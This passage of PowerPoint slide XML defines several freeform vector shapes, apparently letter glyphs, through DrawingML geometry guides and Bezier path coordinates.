                <a:gd name="T10" fmla="*/ 161 w 193"/>
                <a:gd name="T11" fmla="*/ 76 h 223"/>
                <a:gd name="T12" fmla="*/ 178 w 193"/>
                <a:gd name="T13" fmla="*/ 55 h 223"/>
                <a:gd name="T14" fmla="*/ 178 w 193"/>
                <a:gd name="T15" fmla="*/ 21 h 223"/>
                <a:gd name="T16" fmla="*/ 163 w 193"/>
                <a:gd name="T17" fmla="*/ 0 h 223"/>
                <a:gd name="T18" fmla="*/ 148 w 193"/>
                <a:gd name="T19" fmla="*/ 11 h 223"/>
                <a:gd name="T20" fmla="*/ 95 w 193"/>
                <a:gd name="T21" fmla="*/ 0 h 223"/>
                <a:gd name="T22" fmla="*/ 0 w 193"/>
                <a:gd name="T23" fmla="*/ 59 h 223"/>
                <a:gd name="T24" fmla="*/ 98 w 193"/>
                <a:gd name="T25" fmla="*/ 120 h 223"/>
                <a:gd name="T26" fmla="*/ 163 w 193"/>
                <a:gd name="T27" fmla="*/ 157 h 223"/>
                <a:gd name="T28" fmla="*/ 99 w 193"/>
                <a:gd name="T29" fmla="*/ 192 h 223"/>
                <a:gd name="T30" fmla="*/ 35 w 193"/>
                <a:gd name="T31" fmla="*/ 148 h 223"/>
                <a:gd name="T32" fmla="*/ 18 w 193"/>
                <a:gd name="T33" fmla="*/ 133 h 223"/>
                <a:gd name="T34" fmla="*/ 0 w 193"/>
                <a:gd name="T35" fmla="*/ 154 h 223"/>
                <a:gd name="T36" fmla="*/ 0 w 193"/>
                <a:gd name="T37" fmla="*/ 202 h 223"/>
                <a:gd name="T38" fmla="*/ 15 w 193"/>
                <a:gd name="T39" fmla="*/ 223 h 223"/>
                <a:gd name="T40" fmla="*/ 34 w 193"/>
                <a:gd name="T41" fmla="*/ 204 h 223"/>
                <a:gd name="T42" fmla="*/ 98 w 193"/>
                <a:gd name="T43" fmla="*/ 223 h 223"/>
                <a:gd name="T44" fmla="*/ 193 w 193"/>
                <a:gd name="T45" fmla="*/ 157 h 223"/>
                <a:gd name="T46" fmla="*/ 113 w 193"/>
                <a:gd name="T47" fmla="*/ 9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3" h="223">
                  <a:moveTo>
                    <a:pt x="113" y="93"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="101" y="91"/>
                    <a:pt x="91" y="89"/>
                    <a:pt x="79" y="87"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="64" y="85"/>
                    <a:pt x="31" y="79"/>
                    <a:pt x="31" y="59"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="31" y="46"/>
                    <a:pt x="47" y="31"/>
                    <a:pt x="94" y="31"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="135" y="31"/>
                    <a:pt x="142" y="46"/>
                    <a:pt x="144" y="59"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="144" y="67"/>
                    <a:pt x="145" y="76"/>
                    <a:pt x="161" y="76"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="178" y="76"/>
                    <a:pt x="178" y="65"/>
                    <a:pt x="178" y="55"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="178" y="21"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="178" y="13"/>
                    <a:pt x="178" y="0"/>
                    <a:pt x="163" y="0"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="151" y="0"/>
                    <a:pt x="149" y="7"/>
                    <a:pt x="148" y="11"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="126" y="0"/>
                    <a:pt x="104" y="0"/>
                    <a:pt x="95" y="0"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="12" y="0"/>
                    <a:pt x="0" y="41"/>
                    <a:pt x="0" y="59"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="105"/>
                    <a:pt x="53" y="114"/>
                    <a:pt x="98" y="120"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="123" y="124"/>
                    <a:pt x="163" y="131"/>
                    <a:pt x="163" y="157"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="163" y="176"/>
                    <a:pt x="144" y="192"/>
                    <a:pt x="99" y="192"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="75" y="192"/>
                    <a:pt x="48" y="187"/>
                    <a:pt x="35" y="148"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="33" y="139"/>
                    <a:pt x="31" y="133"/>
                    <a:pt x="18" y="133"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="133"/>
                    <a:pt x="0" y="144"/>
                    <a:pt x="0" y="154"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="0" y="202"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="210"/>
                    <a:pt x="0" y="223"/>
                    <a:pt x="15" y="223"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="20" y="223"/>
                    <a:pt x="28" y="222"/>
                    <a:pt x="34" y="204"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="58" y="222"/>
                    <a:pt x="84" y="223"/>
                    <a:pt x="98" y="223"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="177" y="223"/>
                    <a:pt x="193" y="181"/>
                    <a:pt x="193" y="157"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="193" y="106"/>
                    <a:pt x="129" y="95"/>
                    <a:pt x="113" y="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1" name="Freeform 182">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{593A0808-1FDB-4379-B142-E2DB7D33E8A6}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks noEditPoints="1"/>
            </p:cNvSpPr>
            <p:nvPr>
              <p:custDataLst>
                <p:tags r:id="rId78"/>
              </p:custDataLst>
            </p:nvPr>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="3263900" y="1692275"/>
              <a:ext cx="79375" cy="88900"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 204 w 204"/>
                <a:gd name="T1" fmla="*/ 112 h 223"/>
                <a:gd name="T2" fmla="*/ 102 w 204"/>
                <a:gd name="T3" fmla="*/ 0 h 223"/>
                <a:gd name="T4" fmla="*/ 0 w 204"/>
                <a:gd name="T5" fmla="*/ 112 h 223"/>
                <a:gd name="T6" fmla="*/ 102 w 204"/>
                <a:gd name="T7" fmla="*/ 223 h 223"/>
                <a:gd name="T8" fmla="*/ 204 w 204"/>
                <a:gd name="T9" fmla="*/ 112 h 223"/>
                <a:gd name="T10" fmla="*/ 102 w 204"/>
                <a:gd name="T11" fmla="*/ 192 h 223"/>
                <a:gd name="T12" fmla="*/ 34 w 204"/>
                <a:gd name="T13" fmla="*/ 109 h 223"/>
                <a:gd name="T14" fmla="*/ 102 w 204"/>
                <a:gd name="T15" fmla="*/ 31 h 223"/>
                <a:gd name="T16" fmla="*/ 170 w 204"/>
                <a:gd name="T17" fmla="*/ 109 h 223"/>
                <a:gd name="T18" fmla="*/ 102 w 204"/>
                <a:gd name="T19" fmla="*/ 19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23">
                  <a:moveTo>
                    <a:pt x="204" y="112"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="204" y="50"/>
                    <a:pt x="158" y="0"/>
                    <a:pt x="102" y="0"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="46" y="0"/>
                    <a:pt x="0" y="50"/>
                    <a:pt x="0" y="112"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="175"/>
                    <a:pt x="47" y="223"/>
                    <a:pt x="102" y="223"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="157" y="223"/>
                    <a:pt x="204" y="175"/>
                    <a:pt x="204" y="112"/>
                  </a:cubicBezTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="102" y="192"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="65" y="192"/>
                    <a:pt x="34" y="155"/>
                    <a:pt x="34" y="109"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="34" y="63"/>
                    <a:pt x="67" y="31"/>
                    <a:pt x="102" y="31"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="138" y="31"/>
                    <a:pt x="170" y="63"/>
                    <a:pt x="170" y="109"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="170" y="155"/>
                    <a:pt x="139" y="192"/>
                    <a:pt x="102" y="19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2" name="Freeform 183">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{95629064-8E1F-4288-9C68-4CEAAAEE87F3}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks/>
            </p:cNvSpPr>
            <p:nvPr>
              <p:custDataLst>
                <p:tags r:id="rId79"/>
              </p:custDataLst>
            </p:nvPr>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="3352800" y="1693863"/>
              <a:ext cx="100013" cy="85725"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 56 w 259"/>
                <a:gd name="T1" fmla="*/ 18 h 218"/>
                <a:gd name="T2" fmla="*/ 36 w 259"/>
                <a:gd name="T3" fmla="*/ 3 h 218"/>
                <a:gd name="T4" fmla="*/ 20 w 259"/>
                <a:gd name="T5" fmla="*/ 3 h 218"/>
                <a:gd name="T6" fmla="*/ 0 w 259"/>
                <a:gd name="T7" fmla="*/ 18 h 218"/>
                <a:gd name="T8" fmla="*/ 28 w 259"/>
                <a:gd name="T9" fmla="*/ 33 h 218"/>
                <a:gd name="T10" fmla="*/ 28 w 259"/>
                <a:gd name="T11" fmla="*/ 187 h 218"/>
                <a:gd name="T12" fmla="*/ 0 w 259"/>
                <a:gd name="T13" fmla="*/ 203 h 218"/>
                <a:gd name="T14" fmla="*/ 20 w 259"/>
                <a:gd name="T15" fmla="*/ 218 h 218"/>
                <a:gd name="T16" fmla="*/ 64 w 259"/>
                <a:gd name="T17" fmla="*/ 218 h 218"/>
                <a:gd name="T18" fmla="*/ 85 w 259"/>
                <a:gd name="T19" fmla="*/ 203 h 218"/>
                <a:gd name="T20" fmla="*/ 56 w 259"/>
                <a:gd name="T21" fmla="*/ 187 h 218"/>
                <a:gd name="T22" fmla="*/ 56 w 259"/>
                <a:gd name="T23" fmla="*/ 98 h 218"/>
                <a:gd name="T24" fmla="*/ 97 w 259"/>
                <a:gd name="T25" fmla="*/ 30 h 218"/>
                <a:gd name="T26" fmla="*/ 116 w 259"/>
                <a:gd name="T27" fmla="*/ 71 h 218"/>
                <a:gd name="T28" fmla="*/ 116 w 259"/>
                <a:gd name="T29" fmla="*/ 187 h 218"/>
                <a:gd name="T30" fmla="*/ 94 w 259"/>
                <a:gd name="T31" fmla="*/ 203 h 218"/>
                <a:gd name="T32" fmla="*/ 114 w 259"/>
                <a:gd name="T33" fmla="*/ 218 h 218"/>
                <a:gd name="T34" fmla="*/ 151 w 259"/>
                <a:gd name="T35" fmla="*/ 218 h 218"/>
                <a:gd name="T36" fmla="*/ 172 w 259"/>
                <a:gd name="T37" fmla="*/ 203 h 218"/>
                <a:gd name="T38" fmla="*/ 143 w 259"/>
                <a:gd name="T39" fmla="*/ 187 h 218"/>
                <a:gd name="T40" fmla="*/ 143 w 259"/>
                <a:gd name="T41" fmla="*/ 98 h 218"/>
                <a:gd name="T42" fmla="*/ 184 w 259"/>
                <a:gd name="T43" fmla="*/ 30 h 218"/>
                <a:gd name="T44" fmla="*/ 203 w 259"/>
                <a:gd name="T45" fmla="*/ 71 h 218"/>
                <a:gd name="T46" fmla="*/ 203 w 259"/>
                <a:gd name="T47" fmla="*/ 187 h 218"/>
                <a:gd name="T48" fmla="*/ 181 w 259"/>
                <a:gd name="T49" fmla="*/ 203 h 218"/>
                <a:gd name="T50" fmla="*/ 201 w 259"/>
                <a:gd name="T51" fmla="*/ 218 h 218"/>
                <a:gd name="T52" fmla="*/ 239 w 259"/>
                <a:gd name="T53" fmla="*/ 218 h 218"/>
                <a:gd name="T54" fmla="*/ 259 w 259"/>
                <a:gd name="T55" fmla="*/ 203 h 218"/>
                <a:gd name="T56" fmla="*/ 231 w 259"/>
                <a:gd name="T57" fmla="*/ 187 h 218"/>
                <a:gd name="T58" fmla="*/ 231 w 259"/>
                <a:gd name="T59" fmla="*/ 67 h 218"/>
                <a:gd name="T60" fmla="*/ 186 w 259"/>
                <a:gd name="T61" fmla="*/ 0 h 218"/>
                <a:gd name="T62" fmla="*/ 137 w 259"/>
                <a:gd name="T63" fmla="*/ 26 h 218"/>
                <a:gd name="T64" fmla="*/ 99 w 259"/>
                <a:gd name="T65" fmla="*/ 0 h 218"/>
                <a:gd name="T66" fmla="*/ 56 w 259"/>
                <a:gd name="T67" fmla="*/ 1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9" h="218">
                  <a:moveTo>
                    <a:pt x="56" y="18"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="55" y="3"/>
                    <a:pt x="45" y="3"/>
                    <a:pt x="36" y="3"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="20" y="3"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="13" y="3"/>
                    <a:pt x="0" y="3"/>
                    <a:pt x="0" y="18"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="33"/>
                    <a:pt x="10" y="33"/>
                    <a:pt x="28" y="33"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="28" y="187"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="10" y="187"/>
                    <a:pt x="0" y="187"/>
                    <a:pt x="0" y="203"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="218"/>
                    <a:pt x="13" y="218"/>
                    <a:pt x="20" y="218"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="64" y="218"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="72" y="218"/>
                    <a:pt x="85" y="218"/>
                    <a:pt x="85" y="203"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="85" y="187"/>
                    <a:pt x="74" y="187"/>
                    <a:pt x="56" y="187"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="56" y="98"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="56" y="54"/>
                    <a:pt x="77" y="30"/>
                    <a:pt x="97" y="30"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="109" y="30"/>
                    <a:pt x="116" y="39"/>
                    <a:pt x="116" y="71"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="116" y="187"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="106" y="187"/>
                    <a:pt x="94" y="187"/>
                    <a:pt x="94" y="203"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="94" y="218"/>
                    <a:pt x="107" y="218"/>
                    <a:pt x="114" y="218"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="151" y="218"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="159" y="218"/>
                    <a:pt x="172" y="218"/>
                    <a:pt x="172" y="203"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="172" y="187"/>
                    <a:pt x="161" y="187"/>
                    <a:pt x="143" y="187"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="143" y="98"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="143" y="54"/>
                    <a:pt x="164" y="30"/>
                    <a:pt x="184" y="30"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="196" y="30"/>
                    <a:pt x="203" y="39"/>
                    <a:pt x="203" y="71"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="203" y="187"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="193" y="187"/>
                    <a:pt x="181" y="187"/>
                    <a:pt x="181" y="203"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="181" y="218"/>
                    <a:pt x="194" y="218"/>
                    <a:pt x="201" y="218"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="239" y="218"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="246" y="218"/>
                    <a:pt x="259" y="218"/>
                    <a:pt x="259" y="203"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="259" y="187"/>
                    <a:pt x="249" y="187"/>
                    <a:pt x="231" y="187"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="231" y="67"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="231" y="57"/>
                    <a:pt x="231" y="0"/>
                    <a:pt x="186" y="0"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="171" y="0"/>
                    <a:pt x="151" y="6"/>
                    <a:pt x="137" y="26"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="129" y="9"/>
                    <a:pt x="116" y="0"/>
                    <a:pt x="99" y="0"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="83" y="0"/>
                    <a:pt x="68" y="7"/>
                    <a:pt x="56" y="1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3" name="Freeform 184">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B8CB8417-A04A-4284-B362-F171765744CE}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks noEditPoints="1"/>
            </p:cNvSpPr>
            <p:nvPr>
              <p:custDataLst>
                <p:tags r:id="rId80"/>
              </p:custDataLst>
            </p:nvPr>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="3470275" y="1658938"/>
              <a:ext cx="71438" cy="120650"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 115 w 188"/>
                <a:gd name="T1" fmla="*/ 110 h 305"/>
                <a:gd name="T2" fmla="*/ 95 w 188"/>
                <a:gd name="T3" fmla="*/ 90 h 305"/>
                <a:gd name="T4" fmla="*/ 25 w 188"/>
                <a:gd name="T5" fmla="*/ 90 h 305"/>
                <a:gd name="T6" fmla="*/ 4 w 188"/>
                <a:gd name="T7" fmla="*/ 105 h 305"/>
                <a:gd name="T8" fmla="*/ 25 w 188"/>
                <a:gd name="T9" fmla="*/ 120 h 305"/>
                <a:gd name="T10" fmla="*/ 81 w 188"/>
                <a:gd name="T11" fmla="*/ 120 h 305"/>
                <a:gd name="T12" fmla="*/ 81 w 188"/>
                <a:gd name="T13" fmla="*/ 274 h 305"/>
                <a:gd name="T14" fmla="*/ 21 w 188"/>
                <a:gd name="T15" fmla="*/ 274 h 305"/>
                <a:gd name="T16" fmla="*/ 0 w 188"/>
                <a:gd name="T17" fmla="*/ 290 h 305"/>
                <a:gd name="T18" fmla="*/ 21 w 188"/>
                <a:gd name="T19" fmla="*/ 305 h 305"/>
                <a:gd name="T20" fmla="*/ 168 w 188"/>
                <a:gd name="T21" fmla="*/ 305 h 305"/>
                <a:gd name="T22" fmla="*/ 188 w 188"/>
                <a:gd name="T23" fmla="*/ 290 h 305"/>
                <a:gd name="T24" fmla="*/ 168 w 188"/>
                <a:gd name="T25" fmla="*/ 274 h 305"/>
                <a:gd name="T26" fmla="*/ 115 w 188"/>
                <a:gd name="T27" fmla="*/ 274 h 305"/>
                <a:gd name="T28" fmla="*/ 115 w 188"/>
                <a:gd name="T29" fmla="*/ 110 h 305"/>
                <a:gd name="T30" fmla="*/ 115 w 188"/>
                <a:gd name="T31" fmla="*/ 24 h 305"/>
                <a:gd name="T32" fmla="*/ 91 w 188"/>
                <a:gd name="T33" fmla="*/ 0 h 305"/>
                <a:gd name="T34" fmla="*/ 66 w 188"/>
                <a:gd name="T35" fmla="*/ 24 h 305"/>
                <a:gd name="T36" fmla="*/ 91 w 188"/>
                <a:gd name="T37" fmla="*/ 49 h 305"/>
                <a:gd name="T38" fmla="*/ 115 w 188"/>
                <a:gd name="T39" fmla="*/ 24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5">
                  <a:moveTo>
                    <a:pt x="115" y="110"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="115" y="95"/>
                    <a:pt x="112" y="90"/>
                    <a:pt x="95" y="90"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="25" y="90"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="17" y="90"/>
                    <a:pt x="4" y="90"/>
                    <a:pt x="4" y="105"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="4" y="120"/>
                    <a:pt x="17" y="120"/>
                    <a:pt x="25" y="120"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="81" y="120"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="81" y="274"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="21" y="274"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="13" y="274"/>
                    <a:pt x="0" y="274"/>
                    <a:pt x="0" y="290"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="305"/>
                    <a:pt x="13" y="305"/>
                    <a:pt x="21" y="305"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="168" y="305"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="175" y="305"/>
                    <a:pt x="188" y="305"/>
                    <a:pt x="188" y="290"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="188" y="274"/>
                    <a:pt x="175" y="274"/>
                    <a:pt x="168" y="274"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="115" y="274"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="115" y="110"/>
                  </a:lnTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="115" y="24"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="115" y="10"/>
                    <a:pt x="104" y="0"/>
                    <a:pt x="91" y="0"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="77" y="0"/>
                    <a:pt x="66" y="10"/>
                    <a:pt x="66" y="24"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="66" y="38"/>
                    <a:pt x="77" y="49"/>
                    <a:pt x="91" y="49"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="104" y="49"/>
                    <a:pt x="115" y="38"/>
                    <a:pt x="115" y="2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4" name="Freeform 185">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C73E6825-3E57-4C12-B8C7-D7B76A748A27}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks/>
            </p:cNvSpPr>
            <p:nvPr>
              <p:custDataLst>
                <p:tags r:id="rId81"/>
              </p:custDataLst>
            </p:nvPr>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="3560762" y="1670050"/>
              <a:ext cx="80963" cy="111125"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 99 w 212"/>
                <a:gd name="T1" fmla="*/ 92 h 280"/>
                <a:gd name="T2" fmla="*/ 180 w 212"/>
                <a:gd name="T3" fmla="*/ 92 h 280"/>
                <a:gd name="T4" fmla="*/ 200 w 212"/>
                <a:gd name="T5" fmla="*/ 77 h 280"/>
                <a:gd name="T6" fmla="*/ 180 w 212"/>
                <a:gd name="T7" fmla="*/ 62 h 280"/>
                <a:gd name="T8" fmla="*/ 99 w 212"/>
                <a:gd name="T9" fmla="*/ 62 h 280"/>
                <a:gd name="T10" fmla="*/ 99 w 212"/>
                <a:gd name="T11" fmla="*/ 21 h 280"/>
                <a:gd name="T12" fmla="*/ 82 w 212"/>
                <a:gd name="T13" fmla="*/ 0 h 280"/>
                <a:gd name="T14" fmla="*/ 64 w 212"/>
                <a:gd name="T15" fmla="*/ 21 h 280"/>
                <a:gd name="T16" fmla="*/ 64 w 212"/>
                <a:gd name="T17" fmla="*/ 62 h 280"/>
                <a:gd name="T18" fmla="*/ 21 w 212"/>
                <a:gd name="T19" fmla="*/ 62 h 280"/>
                <a:gd name="T20" fmla="*/ 0 w 212"/>
                <a:gd name="T21" fmla="*/ 77 h 280"/>
                <a:gd name="T22" fmla="*/ 20 w 212"/>
                <a:gd name="T23" fmla="*/ 92 h 280"/>
                <a:gd name="T24" fmla="*/ 64 w 212"/>
                <a:gd name="T25" fmla="*/ 92 h 280"/>
                <a:gd name="T26" fmla="*/ 64 w 212"/>
                <a:gd name="T27" fmla="*/ 214 h 280"/>
                <a:gd name="T28" fmla="*/ 135 w 212"/>
                <a:gd name="T29" fmla="*/ 280 h 280"/>
                <a:gd name="T30" fmla="*/ 212 w 212"/>
                <a:gd name="T31" fmla="*/ 214 h 280"/>
                <a:gd name="T32" fmla="*/ 194 w 212"/>
                <a:gd name="T33" fmla="*/ 194 h 280"/>
                <a:gd name="T34" fmla="*/ 177 w 212"/>
                <a:gd name="T35" fmla="*/ 213 h 280"/>
                <a:gd name="T36" fmla="*/ 137 w 212"/>
                <a:gd name="T37" fmla="*/ 249 h 280"/>
                <a:gd name="T38" fmla="*/ 99 w 212"/>
                <a:gd name="T39" fmla="*/ 211 h 280"/>
                <a:gd name="T40" fmla="*/ 99 w 212"/>
                <a:gd name="T41" fmla="*/ 9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80">
                  <a:moveTo>
                    <a:pt x="99" y="92"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="180" y="92"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="188" y="92"/>
                    <a:pt x="200" y="92"/>
                    <a:pt x="200" y="77"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="200" y="62"/>
                    <a:pt x="188" y="62"/>
                    <a:pt x="180" y="62"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="99" y="62"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="99" y="21"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="99" y="11"/>
                    <a:pt x="99" y="0"/>
                    <a:pt x="82" y="0"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="64" y="0"/>
                    <a:pt x="64" y="11"/>
                    <a:pt x="64" y="21"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="64" y="62"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="21" y="62"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="13" y="62"/>
                    <a:pt x="0" y="62"/>
                    <a:pt x="0" y="77"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="92"/>
                    <a:pt x="13" y="92"/>
                    <a:pt x="20" y="92"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="64" y="92"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="64" y="214"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="64" y="262"/>
                    <a:pt x="98" y="280"/>
                    <a:pt x="135" y="280"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="171" y="280"/>
                    <a:pt x="212" y="258"/>
                    <a:pt x="212" y="214"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="212" y="205"/>
                    <a:pt x="212" y="194"/>
                    <a:pt x="194" y="194"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="178" y="194"/>
                    <a:pt x="177" y="205"/>
                    <a:pt x="177" y="213"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="177" y="244"/>
                    <a:pt x="148" y="249"/>
                    <a:pt x="137" y="249"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="99" y="249"/>
                    <a:pt x="99" y="223"/>
                    <a:pt x="99" y="211"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="99"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5" name="Freeform 186">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{41FFFE37-DB84-4DA7-BF5D-2E678E4855C5}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks/>
